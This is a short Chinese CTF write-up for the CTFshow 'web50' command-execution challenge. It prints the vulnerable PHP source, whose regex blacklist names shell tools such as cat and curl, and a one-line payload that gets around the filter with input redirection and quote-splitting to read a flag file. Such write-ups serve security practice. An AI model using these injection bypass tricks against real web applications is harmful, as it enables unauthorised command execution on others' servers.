目录

  • 源码
  • 知识点
  • 题解
  • 总结

源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

知识点

依然可以用nl,但是发现题目正则中过滤了\x09和\x26,是十六进制,相当于过滤了把%09和%26url解码后的\t和&,可以把%09换成<,发现?用不了了,可以用两个单引号代替,

题解

?c=nl<fla’'g.php%0a

总结

不是很清楚为什么?会用不了

CTFshow 命令执行 web50相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  3. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  4. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  5. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. python3 通过列表作为键 产生字典
  2. web工程中的各种路径(eclipse开发)
  3. 开源NAS系统使用总结
  4. pfsense 2.2RC版本应用
  5. beego 访问网络_Go--Beego新建项目(解决不能访问的问题)
  6. 无人机成为黑客的新工具,可黑掉部分家用的智能设备
  7. SSM 生成mapper中xml文件:未能解析映射资源:“文件嵌套异常
  8. Oracle如何使用PL/SQL调试存储过程
  9. KTHREAD 线程调度 SDT TEB SEH shellcode中DLL模块机制动态获取 《寒江独钓》内核学习笔记(5)...
  10. MySQL如何把A表查询出来的某个字段的数据插入到新增的字段的下面
  11. Mac 查看jdk版本
  12. zlog 纯C日志函数库
  13. Unity 粒子特效 不受Time.deltaTime影响
  14. 普中51单片机数码管实例
  15. 使用C#创建一个进程杀手Windows服务
  16. Inrie(洪晓军)
  17. 服务器怎么增加独立显卡,dell服务器设置独立显卡(dell服务器加显卡)
  18. 机器视觉——VisionPro应用开发指南
  19. iOS rtmp 摄像头/录屏直播以及观看
  20. putty怎么上传下载文件和目录

热门文章

  1. 目的地返回POJ 2336 动态规划(DP) Ferry Loading II
  2. android edittext 限制文本框输入的长度和提示信息
  3. QFIL工具如何导出手机分区数据
  4. Wince 添加中文字库
  5. springmvc项目在启动完成之后执行一次方法_SpringMVC运行原理
  6. 关于对php-fpm的压力测试
  7. Python网络数据采集
  8. spring集成kafka
  9. PLSQL Developer连接Oracle数据库
  10. CentOS下的账户管理